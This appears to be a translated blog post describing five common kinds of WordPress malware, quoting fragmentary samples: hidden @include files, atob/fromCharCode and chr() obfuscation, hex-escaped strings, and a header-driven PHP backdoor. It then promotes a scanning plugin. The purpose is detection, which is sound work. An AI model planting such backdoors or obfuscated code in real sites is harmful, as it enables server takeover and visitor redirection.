Here are some of the types of malware embedded in WordPress that are common these days. If similar code is included in the site’s program, we suspect that WordPress has been hacked and tampered with.


1 @include statement sandwiched between random string comments

This type of tampering is often seen in core WordPress files such as index.php and wp-config.php.
Specifically, the following tampering occurs

/*ytju6dyr

@include(/home/www/***********/.sd87ywernaksj.mo);

/*ytju6dyr

The random strings above and below the @INCLUDE statement are identifiers for the body of the malware to check if the tampering has been removed.
The tampering also reads the body of the malware, .sd87ywernaksj.mo, in a way that does not raise an error if the file has been removed by @include.
In other words, the body of the malware is .sd87ywernaksj.mo. If the file starts with . at the beginning of a file makes it an invisible file in Linux, so this malware body file is not visible in the general file display method.

2 JAVASCRIPT using atob or String.fromCharCode

This malware is a common modification to Header.php and Footer.php, which are loaded in database submissions and on all pages of a theme, and in most cases it is a redirect hack code that skips the site to another site.

Specifically, the following tampering occurs

document.write(atob(alphanumeric string));
document.write(String.fromCharCode(array of numbers));

atob and String.fromCharCode are string conversion processes used for the purpose of making a program string quickly unreadable. The hacker uses atob and String.fromCharCode to obfuscate what the tampering is doing so that it is not immediately apparent, and then outputs the code to HTML with document.write.

However, String.fromCharCode is often used on Japanese sites to hide e-mail addresses to prevent spam, so it is necessary to distinguish it from malware.

3 A large number of /* */

This malware is often installed in WordPress core files with random string file names.
Example filename nlcebdto.php

Example of malware code

/* Unx */chr ( number /*rgv */ number /*rQZu */ number ).chr (number) . /* VbNc */chr (number

This malware is characterized by the fact that it contains a large number of /* */ (comments) while obfuscating the malware code with CHR. This large number of comments is inserted to prevent detection by malware scanners.

4 Contains a large number of /* */ (comments)

The code of this malware contains a large number of /x-numeric characters as shown below.

\x3f\x70h\x digits\x20@\x digits\x76a\x digits\x digitsc\x digits$\x5f\x52E\x51\x digitsE\x53\x digits[.

The /x-number string is a UTF-8 string that has been converted so that only a program can expand it, making it appear unintelligible to a human eye, and obfuscated so that the program cannot tell what it is doing at first glance.
Other common malware codes include UTF-16 conversions and u00 numbers.

5 Getting information from $_HEADERS

This malware is simple and looks like the following

$_HEADERS = getallheaders();
if (isset($_HEADERS['character'])) {
    $char = $_HEADERS['character']('', $_HEADERS['character']($_HEADERS['character']));
    $_CHARACTER();
}

This malware is called a backdoor, which means that any program that the hacker plants in the headers can be executed on the server.
However, the letters in the above code are common words and vary from file to file, making it a difficult type of tampering to detect.

All of the above types of malware can be scanned

Try the [ Free] WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].